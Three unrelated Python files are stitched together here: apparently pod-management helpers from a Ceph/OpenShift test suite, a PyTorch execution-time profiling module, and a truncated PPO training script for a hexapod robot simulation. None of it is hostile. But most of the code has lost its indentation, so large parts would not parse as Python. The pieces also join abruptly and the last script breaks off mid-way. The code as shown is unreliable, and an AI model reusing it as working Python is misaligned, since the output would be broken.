def get_admin_key_from_ceph_tools():
"""
Fetches admin key secret from ceph
Returns:
admin keyring encoded with base64 as a string
"""
tools_pod = get_ceph_tools_pod()
out = tools_pod.exec_ceph_cmd(ceph_cmd='ceph auth get-key client.admin')
base64_output = base64.b64encode(out['key'].encode()).decode()
return base64_output
def run_io_and_verify_mount_point(pod_obj, bs='10M', count='950'):
"""
Run I/O on mount point
Args:
pod_obj (Pod): The object of the pod
bs (str): Read and write up to bytes at a time
count (str): Copy only N input blocks
Returns:
used_percentage (str): Used percentage on mount point
"""
pod_obj.exec_cmd_on_pod(
command=f"dd if=/dev/urandom of=/var/lib/www/html/dd_a bs={bs} count={count}"
)
# Verify data's are written to mount-point
mount_point = pod_obj.exec_cmd_on_pod(command="df -kh")
mount_point = mount_point.split()
used_percentage = mount_point[mount_point.index('/var/lib/www/html') - 1]
return used_percentage
def get_pods_having_label(label, namespace):
"""
Fetches pod resources with given label in given namespace
Args:
label (str): label which pods might have
namespace (str): Namespace in which to be looked up
Return:
list: of pods info
"""
ocp_pod = OCP(kind=constants.POD, namespace=namespace)
pods = ocp_pod.get(selector=label).get('items')
return pods
def get_deployments_having_label(label, namespace):
"""
Fetches deployment resources with given label in given namespace
Args:
label (str): label which deployments might have
namespace (str): Namespace in which to be looked up
Return:
list: deployment OCP instances
"""
ocp_deployment = OCP(kind=constants.DEPLOYMENT, namespace=namespace)
pods = ocp_deployment.get(selector=label).get('items')
return pods
def get_mds_pods(mds_label=constants.MDS_APP_LABEL, namespace=None):
"""
Fetches info about mds pods in the cluster
Args:
mds_label (str): label associated with mds pods
(default: defaults.MDS_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of mds pod objects
"""
namespace = namespace or config.ENV_DATA['cluster_namespace']
mdss = get_pods_having_label(mds_label, namespace)
mds_pods = [Pod(**mds) for mds in mdss]
return mds_pods
def get_mon_pods(mon_label=constants.MON_APP_LABEL, namespace=None):
"""
Fetches info about mon pods in the cluster
Args:
mon_label (str): label associated with mon pods
(default: defaults.MON_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of mon pod objects
"""
namespace = namespace or config.ENV_DATA['cluster_namespace']
mons = get_pods_having_label(mon_label, namespace)
mon_pods = [Pod(**mon) for mon in mons]
return mon_pods
def get_mgr_pods(mgr_label=constants.MGR_APP_LABEL, namespace=None):
"""
Fetches info about mgr pods in the cluster
Args:
mgr_label (str): label associated with mgr pods
(default: defaults.MGR_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of mgr pod objects
"""
namespace = namespace or config.ENV_DATA['cluster_namespace']
mgrs = get_pods_having_label(mgr_label, namespace)
mgr_pods = [Pod(**mgr) for mgr in mgrs]
return mgr_pods
def get_osd_pods(osd_label=constants.OSD_APP_LABEL, namespace=None):
"""
Fetches info about osd pods in the cluster
Args:
osd_label (str): label associated with osd pods
(default: defaults.OSD_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of osd pod objects
"""
namespace = namespace or config.ENV_DATA['cluster_namespace']
osds = get_pods_having_label(osd_label, namespace)
osd_pods = [Pod(**osd) for osd in osds]
return osd_pods
def get_osd_prepare_pods(
osd_prepare_label=constants.OSD_PREPARE_APP_LABEL, namespace=defaults.ROOK_CLUSTER_NAMESPACE
):
"""
Fetches info about osd prepare pods in the cluster
Args:
osd_prepare_label (str): label associated with osd prepare pods
(default: constants.OSD_PREPARE_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list: OSD prepare pod objects
"""
namespace = namespace or config.ENV_DATA['cluster_namespace']
osds = get_pods_having_label(osd_prepare_label, namespace)
osd_pods = [Pod(**osd) for osd in osds]
return osd_pods
def get_osd_deployments(osd_label=constants.OSD_APP_LABEL, namespace=None):
"""
Fetches info about osd deployments in the cluster
Args:
osd_label (str): label associated with osd deployments
(default: defaults.OSD_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list: OSD deployment OCS instances
"""
namespace = namespace or config.ENV_DATA['cluster_namespace']
osds = get_deployments_having_label(osd_label, namespace)
osd_deployments = [OCS(**osd) for osd in osds]
return osd_deployments
def get_pod_count(label, namespace=None):
namespace = namespace or config.ENV_DATA['cluster_namespace']
pods = get_pods_having_label(label=label, namespace=namespace)
return len(pods)
def get_cephfsplugin_provisioner_pods(
cephfsplugin_provisioner_label=constants.CSI_CEPHFSPLUGIN_PROVISIONER_LABEL,
namespace=None
):
"""
Fetches info about CSI Cephfs plugin provisioner pods in the cluster
Args:
cephfsplugin_provisioner_label (str): label associated with cephfs
provisioner pods
(default: defaults.CSI_CEPHFSPLUGIN_PROVISIONER_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : csi-cephfsplugin-provisioner Pod objects
"""
namespace = namespace or config.ENV_DATA['cluster_namespace']
pods = get_pods_having_label(cephfsplugin_provisioner_label, namespace)
fs_plugin_pods = [Pod(**pod) for pod in pods]
return fs_plugin_pods
def get_rbdfsplugin_provisioner_pods(
rbdplugin_provisioner_label=constants.CSI_RBDPLUGIN_PROVISIONER_LABEL,
namespace=None
):
"""
Fetches info about CSI RBD plugin provisioner pods in the cluster
Args:
rbdplugin_provisioner_label (str): label associated with RBD
provisioner pods
(default: defaults.CSI_RBDPLUGIN_PROVISIONER_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : csi-rbdplugin-provisioner Pod objects
"""
namespace = namespace or config.ENV_DATA['cluster_namespace']
pods = get_pods_having_label(rbdplugin_provisioner_label, namespace)
rbd_plugin_pods = [Pod(**pod) for pod in pods]
return rbd_plugin_pods
def get_pod_obj(name, namespace=None):
"""
Returns the pod obj for the given pod
Args:
name (str): Name of the resources
Returns:
obj : A pod object
"""
ocp_obj = OCP(api_version='v1', kind=constants.POD, namespace=namespace)
ocp_dict = ocp_obj.get(resource_name=name)
pod_obj = Pod(**ocp_dict)
return pod_obj
def get_pod_logs(pod_name, container=None, namespace=defaults.ROOK_CLUSTER_NAMESPACE, previous=False):
"""
Get logs from a given pod
Args:
pod_name (str): Name of the pod
container (str): Name of the container
namespace (str): Namespace of the pod
previous (bool): True, if pod previous log required. False otherwise.
Returns:
str: Output of the 'oc logs <pod_name>' command
"""
pod = OCP(
kind=constants.POD, namespace=namespace
)
cmd = f"logs {pod_name}"
if container:
cmd += f" -c {container}"
if previous:
cmd += " --previous"
return pod.exec_oc_cmd(cmd, out_yaml_format=False)
def get_pod_node(pod_obj):
"""
Get the node that the pod is running on
Args:
pod_obj (OCS): The pod object
Returns:
ocs_ci.ocs.ocp.OCP: The node object
"""
node_name = pod_obj.get().get('spec').get('nodeName')
return node.get_node_objs(node_names=node_name)[0]
def delete_pods(pod_objs, wait=True):
"""
Deletes list of the pod objects
Args:
pod_objs (list): List of the pod objects to be deleted
wait (bool): Determines if the delete command should wait for
completion
"""
for pod in pod_objs:
pod.delete(wait=wait)
def validate_pods_are_respinned_and_running_state(pod_objs_list):
"""
Verifies the list of the pods are respinned and in running state
Args:
pod_objs_list (list): List of the pods obj
Returns:
bool : True if the pods are respinned and running, False otherwise
Raises:
ResourceWrongStatusException: In case the resources hasn't
reached the Running state
"""
for pod in pod_objs_list:
helpers.wait_for_resource_state(pod, constants.STATUS_RUNNING, timeout=180)
for pod in pod_objs_list:
pod_obj = pod.get()
start_time = pod_obj['status']['startTime']
ts = time.strptime(start_time, '%Y-%m-%dT%H:%M:%SZ')
ts = calendar.timegm(ts)
current_time_utc = time.time()
sec = current_time_utc - ts
if (sec / 3600) >= 1:
logger.error(
f'Pod {pod.name} is not respinned, the age of the pod is {start_time}'
)
return False
return True
def verify_node_name(pod_obj, node_name):
"""
Verifies that the pod is running on a particular node
Args:
pod_obj (Pod): The pod object
node_name (str): The name of node to check
Returns:
bool: True if the pod is running on a particular node, False otherwise
"""
logger.info(
f"Checking whether the pod {pod_obj.name} is running on "
f"node {node_name}"
)
actual_node = pod_obj.get().get('spec').get('nodeName')
if actual_node == node_name:
logger.info(
f"The pod {pod_obj.name} is running on the specified node "
f"{actual_node}"
)
return True
else:
logger.info(
f"The pod {pod_obj.name} is not running on the specified node "
f"specified node: {node_name}, actual node: {actual_node}"
)
return False
def get_pvc_name(pod_obj):
"""
Function to get pvc_name from pod_obj
Args:
pod_obj (Pod): The pod object
Returns:
str: The pvc name of a given pod_obj,
Raises:
UnavailableResourceException: If no pvc attached
"""
pvc = pod_obj.get().get('spec').get('volumes')[0].get('persistentVolumeClaim')
if not pvc:
raise UnavailableResourceException
return pvc.get('claimName')
def get_used_space_on_mount_point(pod_obj):
"""
Get the used space on a mount point
Args:
pod_obj (POD): The pod object
Returns:
int: Percentage represent the used space on the mount point
"""
# Verify data's are written to mount-point
mount_point = pod_obj.exec_cmd_on_pod(command="df -kh")
mount_point = mount_point.split()
used_percentage = mount_point[mount_point.index(constants.MOUNT_POINT) - 1]
return used_percentage
def get_plugin_pods(interface, namespace=None):
"""
Fetches info of csi-cephfsplugin pods or csi-rbdplugin pods
Args:
interface (str): Interface type. eg: CephBlockPool, CephFileSystem
namespace (str): Name of cluster namespace
Returns:
list : csi-cephfsplugin pod objects or csi-rbdplugin pod objects
"""
if interface == constants.CEPHFILESYSTEM:
plugin_label = constants.CSI_CEPHFSPLUGIN_LABEL
if interface == constants.CEPHBLOCKPOOL:
plugin_label = constants.CSI_RBDPLUGIN_LABEL
namespace = namespace or config.ENV_DATA['cluster_namespace']
plugins_info = get_pods_having_label(plugin_label, namespace)
plugin_pods = [Pod(**plugin) for plugin in plugins_info]
return plugin_pods
def plugin_provisioner_leader(interface, namespace=None):
"""
Find csi-cephfsplugin-provisioner or csi-rbdplugin-provisioner leader pod
Args:
interface (str): Interface type. eg: CephBlockPool, CephFileSystem
namespace (str): Name of cluster namespace
Returns:
Pod: csi-cephfsplugin-provisioner or csi-rbdplugin-provisioner leader
pod
"""
non_leader_msg = 'failed to acquire lease'
lease_acq_msg = 'successfully acquired lease'
lease_renew_msg = 'successfully renewed lease'
leader_pod = ''
if interface == constants.CEPHBLOCKPOOL:
pods = get_rbdfsplugin_provisioner_pods(namespace=namespace)
if interface == constants.CEPHFILESYSTEM:
pods = get_cephfsplugin_provisioner_pods(namespace=namespace)
pods_log = {}
for pod in pods:
pods_log[pod] = get_pod_logs(
pod_name=pod.name, container='csi-provisioner'
).split('\n')
for pod, log_list in pods_log.items():
# Reverse the list to find last occurrence of message without
# iterating over all elements
log_list.reverse()
for log_msg in log_list:
# Check for last occurrence of leader messages.
# This will be the first occurrence in reversed list.
if (lease_renew_msg in log_msg) or (lease_acq_msg in log_msg):
curr_index = log_list.index(log_msg)
# Ensure that there is no non leader message logged after
# the last occurrence of leader message
if not any(
non_leader_msg in msg for msg in log_list[:curr_index]
):
assert not leader_pod, (
"Couldn't identify plugin provisioner leader pod by "
"analysing the logs. Found more than one match."
)
leader_pod = pod
break
assert leader_pod, "Couldn't identify plugin provisioner leader pod."
logger.info(f"Plugin provisioner leader pod is {leader_pod.name}")
return leader_pod
def get_operator_pods(operator_label=constants.OPERATOR_LABEL, namespace=None):
"""
Fetches info about rook-ceph-operator pods in the cluster
Args:
operator_label (str): Label associated with rook-ceph-operator pod
namespace (str): Namespace in which ceph cluster lives
Returns:
list : of rook-ceph-operator pod objects
"""
namespace = namespace or config.ENV_DATA['cluster_namespace']
operators = get_pods_having_label(operator_label, namespace)
operator_pods = [Pod(**operator) for operator in operators]
return operator_pods
def upload(pod_name, localpath, remotepath, namespace=None):
"""
Upload a file to pod
Args:
pod_name (str): Name of the pod
localpath (str): Local file to upload
remotepath (str): Target path on the pod
"""
namespace = namespace or constants.DEFAULT_NAMESPACE
cmd = f"oc -n {namespace} cp {os.path.expanduser(localpath)} {pod_name}:{remotepath}"
run_cmd(cmd)
def download_file_from_pod(pod_name, remotepath, localpath, namespace=None):
"""
Download a file from a pod
Args:
pod_name (str): Name of the pod
remotepath (str): Target path on the pod
localpath (str): Local file to upload
namespace (str): The namespace of the pod
"""
namespace = namespace or constants.DEFAULT_NAMESPACE
cmd = f"oc -n {namespace} cp {pod_name}:{remotepath} {os.path.expanduser(localpath)}"
run_cmd(cmd)
def wait_for_storage_pods(timeout=200):
"""
Check all OCS pods status, they should be in Running or Completed state
Args:
timeout (int): Number of seconds to wait for pods to get into correct
state
"""
all_pod_obj = get_all_pods(
namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
for pod_obj in all_pod_obj:
state = constants.STATUS_RUNNING
if any(i in pod_obj.name for i in ['-1-deploy', 'ocs-deviceset']):
state = constants.STATUS_COMPLETED
try:
helpers.wait_for_resource_state(
resource=pod_obj,
state=state,
timeout=timeout
)
except ResourceWrongStatusException:
# 'rook-ceph-crashcollector' on the failed node gets stuck in
# Pending state. BZ 1810014 tracks it.
# As a workaround, ignore the 'rook-ceph-crashcollector' pod
# health check and delete its deployment so that the pod
# disappears. Revert this workaround once the BZ is fixed.
if 'rook-ceph-crashcollector' in pod_obj.name:
ocp_obj = ocp.OCP(
namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
pod_name = pod_obj.name
deployment_name = '-'.join(pod_name.split("-")[:-2])
command = f"delete deployment {deployment_name}"
ocp_obj.exec_oc_cmd(command=command)
logger.info(f"Deleted deployment for pod {pod_obj.name}")
else:
raise
def verify_pods_upgraded(old_images, selector, count=1, timeout=720):
"""
Verify that all pods do not have old image.
Args:
old_images (set): Set with old images.
selector (str): Selector (e.g. app=ocs-osd)
count (int): Number of resources for selector.
timeout (int): Timeout in seconds to wait for pods to be upgraded.
Raises:
TimeoutException: If the pods didn't get upgraded till the timeout.
"""
namespace = config.ENV_DATA['cluster_namespace']
pod = OCP(
kind=constants.POD, namespace=namespace,
)
info_message = (
f"Waiting for {count} pods with selector: {selector} to be running "
f"and upgraded."
)
logger.info(info_message)
start_time = time.time()
selector_label, selector_value = selector.split('=')
while True:
pod_count = 0
pods_len = 0  # ensure it is defined even if listing pods fails below
try:
pods = get_all_pods(namespace, [selector_value], selector_label)
pods_len = len(pods)
logger.info(f"Found {pods_len} pod(s) for selector: {selector}")
if pods_len != count:
logger.warning(
f"Number of found pods {pods_len} is not as expected: "
f"{count}"
)
for pod in pods:
verify_images_upgraded(old_images, pod.get())
pod_count += 1
except CommandFailed as ex:
logger.warning(
f"Failed when getting pods with selector {selector}."
f"Error: {ex}"
)
except NonUpgradedImagesFoundError as ex:
logger.warning(ex)
check_timeout_reached(start_time, timeout, info_message)
if pods_len != count:
logger.error(f"Found pods: {pods_len} but expected: {count}!")
elif pod_count == count:
return
def get_noobaa_pods(noobaa_label=constants.NOOBAA_APP_LABEL, namespace=None):
"""
Fetches info about noobaa pods in the cluster
Args:
noobaa_label (str): label associated with noobaa pods
(default: defaults.NOOBAA_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of noobaa pod objects
"""
namespace = namespace or config.ENV_DATA['cluster_namespace']
noobaas = get_pods_having_label(noobaa_label, namespace)
noobaa_pods = [Pod(**noobaa) for noobaa in noobaas]
return noobaa_pods
def wait_for_dc_app_pods_to_reach_running_state(
dc_pod_obj, timeout=120, exclude_state=None
):
"""
Wait for DC app pods to reach running state
Args:
dc_pod_obj (list): list of dc app pod objects
timeout (int): Timeout in seconds to wait for pods to be in Running
state.
exclude_state (str): A resource state to ignore
"""
for pod_obj in dc_pod_obj:
name = pod_obj.get_labels().get('name')
dpod_list = get_all_pods(selector_label=f"name={name}", wait=True)
for dpod in dpod_list:
if '-1-deploy' not in dpod.name and dpod.status != exclude_state:
helpers.wait_for_resource_state(
dpod, constants.STATUS_RUNNING, timeout=timeout
)
def delete_deploymentconfig_pods(pod_obj):
"""
Delete a DeploymentConfig pod and all the pods that are controlled by it
Args:
pod_obj (Pod): Pod object
"""
dc_ocp_obj = ocp.OCP(kind=constants.DEPLOYMENTCONFIG, namespace=pod_obj.namespace)
pod_data_list = dc_ocp_obj.get().get('items')
if pod_data_list:
for pod_data in pod_data_list:
if pod_obj.get_labels().get('name') == pod_data.get('metadata').get('name'):
dc_ocp_obj.delete(resource_name=pod_obj.get_labels().get('name'))
dc_ocp_obj.wait_for_delete(
resource_name=pod_obj.get_labels().get('name')
)
def wait_for_new_osd_pods_to_come_up(number_of_osd_pods_before):
status_options = ['Init:1/4', 'Init:2/4', 'Init:3/4', 'PodInitializing', 'Running']
try:
for osd_pods in TimeoutSampler(
timeout=180, sleep=3, func=get_osd_pods
):
# Check if the new osd pods has started to come up
new_osd_pods = osd_pods[number_of_osd_pods_before:]
new_osd_pods_come_up = [pod.status() in status_options for pod in new_osd_pods]
if any(new_osd_pods_come_up):
logging.info("One or more of the new osd pods has started to come up")
break
except TimeoutExpiredError:
logging.warning(
"None of the new osd pods reached the desired status"
)
def get_pod_restarts_count(namespace=defaults.ROOK_CLUSTER_NAMESPACE):
"""
Gets the dictionary of pod and its restart count for all the pods in a given namespace
Returns:
dict: dictionary of pod name and its corresponding restart count
"""
list_of_pods = get_all_pods(namespace)
restart_dict = {}
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
for p in list_of_pods:
# we don't want to compare osd-prepare and canary pods as they get created freshly when an osd needs to be added.
if "rook-ceph-osd-prepare" not in p.name and "rook-ceph-drain-canary" not in p.name:
restart_dict[p.name] = int(ocp_pod_obj.get_resource(p.name, 'RESTARTS'))
logging.info(f"get_pod_restarts_count: restarts dict = {restart_dict}")
return restart_dict
def check_pods_in_running_state(namespace=defaults.ROOK_CLUSTER_NAMESPACE):
"""
checks whether all the pods in a given namespace are in Running state or not
Returns:
Boolean: True, if all pods in Running state. False, otherwise
"""
ret_val = True
list_of_pods = get_all_pods(namespace)
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
for p in list_of_pods:
# we don't want to check osd-prepare and canary pods as they get created freshly when an osd needs to be added.
if "rook-ceph-osd-prepare" not in p.name and "rook-ceph-drain-canary" not in p.name:
status = ocp_pod_obj.get_resource(p.name, 'STATUS')
if status not in "Running":
logging.error(f"The pod {p.name} is in {status} state. Expected = Running")
ret_val = False
return ret_val
|
_time_summary.py
|
# mypy: ignore-errors
import atexit
from contextlib import contextmanager
import os
import time
from typing import Callable, Dict, Generator, Optional, Tuple
import threading
import queue
import multiprocessing as mp
import torch
import weakref
from pytorch_pfn_extras.reporting import DictSummary
Events = Tuple[torch.cuda.Event, torch.cuda.Event]
class _ReportNotification:
def __init__(self, summary, tag, use_cuda, begin_event, begin):
self._is_completed = True
self._summary = summary
self._tag = tag
self._use_cuda = use_cuda
self._begin_event = begin_event
self._begin = begin
def defer(self) -> None:
self._is_completed = False
def complete(self) -> None:
self._summary.complete_report(
self._tag, self._use_cuda, self._begin_event, self._begin)
class _CPUWorker:
def __init__(
self,
add: Callable[[str, float], None],
max_queue_size: int,
) -> None:
self._add = add
self._max_queue_size = max_queue_size
self._initialized = False
self._queue: Optional[mp.JoinableQueue[Optional[Tuple[str, float]]]] = None
self._thread: Optional[threading.Thread] = None
def initialize(self) -> None:
if self._initialized:
return
self._queue = mp.JoinableQueue(self._max_queue_size)
self._thread = threading.Thread(target=self._worker, daemon=True)
self._thread.start()
self._initialized = True
def finalize(self) -> None:
if not self._initialized:
return
assert self._queue is not None
assert self._thread is not None
self._queue.put(None)
self._queue.join()
self._queue.close()
self._queue.join_thread()
self._thread.join()
self._initialized = False
def synchronize(self) -> None:
assert self._queue is not None
self._queue.join()
def put(self, name: str, value: float) -> None:
assert self._queue is not None
self._queue.put((name, value))
def _worker(self) -> None:
assert self._queue is not None
while True:
v = self._queue.get()
if v is None:
self._queue.task_done()
break
name, value = v
self._add(name, value)
self._queue.task_done()
_QueueElem = Tuple[str, Tuple[torch.cuda.Event, torch.cuda.Event]]
class _CUDAWorker:
def __init__(
self,
add: Callable[[str, float], None],
max_queue_size: int,
) -> None:
self._add = add
self._max_queue_size = max_queue_size
self._initialized = False
self._thread: Optional[threading.Thread] = None
self._queue: Optional['queue.Queue[Optional[_QueueElem]]'] = None
self._event_lock = threading.Lock()
self._events: Optional['queue.Queue[torch.cuda.Event]'] = None
def initialize(self) -> None:
if self._initialized:
return
self._queue = queue.Queue(self._max_queue_size)
self._events = queue.Queue(self._max_queue_size * 2)
self._thread = threading.Thread(target=self._worker, daemon=True)
self._thread.start()
self._initialized = True
def finalize(self) -> None:
if not self._initialized:
return
assert self._queue is not None
assert self._thread is not None
self._queue.put(None)
self._queue.join()
self._thread.join()
self._initialized = False
def synchronize(self) -> None:
assert self._queue is not None
self._queue.join()
def put(
self,
name: str,
events: Tuple[torch.cuda.Event, torch.cuda.Event],
) -> None:
assert self._queue is not None
self._queue.put((name, events))
def _worker(self) -> None:
assert self._queue is not None
assert self._events is not None
while True:
v = self._queue.get()
if v is None:
self._queue.task_done()
break
name, (begin, end) = v
end.synchronize() # type: ignore[no-untyped-call]
t_ms = begin.elapsed_time(end) # type: ignore[no-untyped-call]
self._add(name, t_ms / 1000)
with self._event_lock:
self._events.put(begin)
self._events.put(end)
self._queue.task_done()
def get_cuda_event(self) -> torch.cuda.Event:
assert self._initialized
assert self._events is not None
with self._event_lock:
if self._events.empty():
event = torch.cuda.Event( # type: ignore[no-untyped-call]
enable_timing=True)
self._events.put(event)
return self._events.get()
class _Finalizer:
def __init__(self, ts: 'TimeSummary') -> None:
self._ts = weakref.ref(ts)
def __call__(self) -> None:
ts = self._ts()
if ts:
ts.finalize()
class TimeSummary:
"""Online summarization of execution times.
`TimeSummary` computes the average and standard deviation of execution
times on both CPU and GPU devices.
Args:
max_queue_size (int): Length limit of the internal queues that keep
reported time info until they are summarized.
auto_init (bool): Whether to automatically call `initialize()`
when the instance is created.
"""
def __init__(self, *, max_queue_size: int = 1000, auto_init: bool = True) -> None:
self._summary_lock = threading.Lock()
self._summary = DictSummary()
self._additional_stats: Dict[str, float] = {}
self._cpu_worker = _CPUWorker(self._add_from_worker, max_queue_size)
self._cuda_worker: Optional[_CUDAWorker] = None
if torch.cuda.is_available():
self._cuda_worker = _CUDAWorker(self._add_from_worker, max_queue_size)
self._initialized = False
self._master_pid = os.getpid()
if auto_init:
self.initialize()
atexit.register(_Finalizer(self))
def __del__(self) -> None:
self.finalize()
def initialize(self) -> None:
"""Initializes the worker threads for TimeSummary.
        Usually you do not have to call it yourself.
        However, in case you directly use ``ppe.time_summary`` outside of
:class:`pytorch_pfn_extras.training.extensions.ProfileReport`,
you have to explicitly call ``initialize()`` in advance.
"""
if self._initialized:
return
if os.getpid() != self._master_pid:
raise RuntimeError(
"TimeSummary must be initialized in the same process as the "
"one created the instance. Please call initialize() in the "
"main process.")
self._cpu_worker.initialize()
if self._cuda_worker is not None:
self._cuda_worker.initialize()
self._initialized = True
def finalize(self) -> None:
if not self._initialized:
return
self._cpu_worker.finalize()
if self._cuda_worker is not None:
self._cuda_worker.finalize()
self._initialized = False
def synchronize(self) -> None:
self.initialize()
self._cpu_worker.synchronize()
if self._cuda_worker is not None:
self._cuda_worker.synchronize()
def _add_from_worker(self, name: str, value: float) -> None:
assert self._initialized
with self._summary_lock:
self._summary.add({name: value})
min_value = self._additional_stats.get(f"{name}.min", value)
self._additional_stats[f"{name}.min"] = min(value, min_value)
max_value = self._additional_stats.get(f"{name}.max", value)
self._additional_stats[f"{name}.max"] = max(value, max_value)
def add(self, name: str, value: float) -> None:
self._add_from_worker(name, value)
@contextmanager
def summary(
self,
clear: bool = False,
) -> Generator[Tuple[DictSummary, Dict[str, float]], None, None]:
self.initialize()
try:
with self._summary_lock:
yield self._summary, self._additional_stats
finally:
if clear:
self._summary = DictSummary()
self._additional_stats = {}
    def complete_report(
        self,
        tag: str,
        use_cuda: bool,
        begin_event: Optional[torch.cuda.Event],
        begin: float,
    ) -> None:
        end = time.time()
        self._cpu_worker.put(tag, end - begin)
        if use_cuda:
            assert self._cuda_worker is not None
            assert begin_event is not None
            end_event = self._cuda_worker.get_cuda_event()
            end_event.record()  # type: ignore[no-untyped-call]
            self._cuda_worker.put(f"{tag}.cuda", (begin_event, end_event))
@contextmanager
def report(
self,
tag: str,
use_cuda: bool = False,
) -> Generator[_ReportNotification, None, None]:
"""Context manager to automatically report execution times.
The start and completion times are obtained automatically,
the user only needs to provide a tag to identify the value
in the summary values.
Args:
tag (str): A name to identify the section of code being profiled.
use_cuda (bool): Indicates if GPU time should also be profiled.
"""
self.initialize()
begin_event = None
if use_cuda:
assert self._cuda_worker is not None
begin_event = self._cuda_worker.get_cuda_event()
begin_event.record() # type: ignore[no-untyped-call]
try:
begin = time.time()
notification = _ReportNotification(
self, tag, use_cuda, begin_event, begin)
yield notification
finally:
if notification._is_completed:
self.complete_report(tag, use_cuda, begin_event, begin)
_thread_local = threading.local()
def get_time_summary() -> TimeSummary:
if not hasattr(_thread_local, 'time_summary'):
_thread_local.time_summary = TimeSummary(auto_init=False)
return _thread_local.time_summary
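# ---------------------------------------------------------------------------
# Minimal usage sketch (illustrative only, not part of the public API above).
# It assumes the module is executed directly; `fake_step` is a hypothetical
# stand-in for the work being profiled.
if __name__ == '__main__':
    def fake_step() -> None:
        time.sleep(0.01)

    ts = get_time_summary()
    ts.initialize()
    for _ in range(5):
        # Each iteration reports one "step" measurement into the summary.
        with ts.report("step"):
            fake_step()
    # Wait until the worker threads have drained the queued measurements.
    ts.synchronize()
    with ts.summary() as (summary, stats):
        # `summary` aggregates mean/std per tag; `stats` keeps min/max values.
        print(stats)
    ts.finalize()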
|
train_dppo2_mlp.py
|
import os
import sys
import time
from datetime import datetime
import gym
import gym_gazebo2
import tensorflow as tf
import multiprocessing
import threading
from importlib import import_module
from baselines import bench, logger
from baselines.ppo2 import ppo2
from baselines.common.vec_env.dummy_vec_env import DummyVecEnv
ncpu = multiprocessing.cpu_count()
if sys.platform == 'darwin':
ncpu //= 2
config = tf.ConfigProto(allow_soft_placement=True,
intra_op_parallelism_threads=ncpu,
inter_op_parallelism_threads=ncpu,
log_device_placement=False)
config.gpu_options.allow_growth = True
tf.Session(config=config).__enter__()
def get_alg_module(alg, submodule=None):
submodule = submodule or alg
try:
        # first try to import the alg module from baselines
alg_module = import_module('.'.join(['baselines', alg, submodule]))
except ImportError:
# then from rl_algs
alg_module = import_module('.'.join(['rl_' + 'algs', alg, submodule]))
return alg_module
def get_learn_function(alg, submodule=None):
return get_alg_module(alg, submodule).learn
def get_learn_function_defaults(alg, env_type):
try:
alg_defaults = get_alg_module(alg, 'defaults')
kwargs = getattr(alg_defaults, env_type)()
except (ImportError, AttributeError):
kwargs = {}
return kwargs
leg_name = ""
def make_env_limb():
env = gym.make('PhantomXLeg-v0')
env.set_info(main_env.info)
# env.set_episode_size(alg_kwargs['nsteps'])
env.leg_name = leg_name
os.makedirs(logger.get_dir() + "/" + leg_name, exist_ok=True)
    env = bench.Monitor(env, logger.get_dir() + "/" + leg_name + "/log",
allow_early_resets=True)
return env
# Get dictionary from baselines/ppo2/defaults
env_type = 'phantomx_mlp'
alg_kwargs = get_learn_function_defaults('ppo2', env_type)
# Create needed folders
timedate = datetime.now().strftime('%Y-%m-%d_%Hh%Mmin')
logdir = '/tmp/ros2learn/' + alg_kwargs['env_name'] + '/dppo2_mlp/' + timedate
# Generate tensorboard file
format_strs = os.getenv('MARA_LOG_FORMAT', 'stdout,log,csv,tensorboard').split(',')
logger.configure(os.path.abspath(logdir), format_strs)
with open(logger.get_dir() + "/parameters.txt", 'w') as out:
out.write(
'num_layers = ' + str(alg_kwargs['num_layers']) + '\n'
+ 'num_hidden = ' + str(alg_kwargs['num_hidden']) + '\n'
+ 'layer_norm = ' + str(alg_kwargs['layer_norm']) + '\n'
+ 'nsteps = ' + str(alg_kwargs['nsteps']) + '\n'
+ 'nminibatches = ' + str(alg_kwargs['nminibatches']) + '\n'
+ 'lam = ' + str(alg_kwargs['lam']) + '\n'
+ 'gamma = ' + str(alg_kwargs['gamma']) + '\n'
+ 'noptepochs = ' + str(alg_kwargs['noptepochs']) + '\n'
+ 'log_interval = ' + str(alg_kwargs['log_interval']) + '\n'
+ 'ent_coef = ' + str(alg_kwargs['ent_coef']) + '\n'
+ 'cliprange = ' + str(alg_kwargs['cliprange']) + '\n'
+ 'vf_coef = ' + str(alg_kwargs['vf_coef']) + '\n'
+ 'max_grad_norm = ' + str(alg_kwargs['max_grad_norm']) + '\n'
+ 'seed = ' + str(alg_kwargs['seed']) + '\n'
+ 'value_network = ' + alg_kwargs['value_network'] + '\n'
+ 'network = ' + alg_kwargs['network'] + '\n'
+ 'total_timesteps = ' + str(alg_kwargs['total_timesteps']) + '\n'
+ 'save_interval = ' + str(alg_kwargs['save_interval']) + '\n'
+ 'env_name = ' + alg_kwargs['env_name'] + '\n'
+ 'transfer_path = ' + str(alg_kwargs['transfer_path']) )
main_env = gym.make('PhantomX-v0')
# main_env.set_episode_size(alg_kwargs['nsteps'])
# main_env = bench.Monitor(main_env, logger.get_dir() and os.path.join(logger.get_dir()), allow_early_resets=True)
# left_env = DummyVecEnv([make_env_left])
# right_env = DummyVecEnv([make_env_right])
leg_envs = {}
learners = {}
legs = ['lf', 'lm', 'lr', 'rf', 'rm', 'rr']
for leg in legs:
leg_name = leg
leg_envs[leg] = DummyVecEnv([make_env_limb])
learners[leg] = get_learn_function('ppo2')
transfer_path = alg_kwargs['transfer_path']
# Remove unused parameters for training
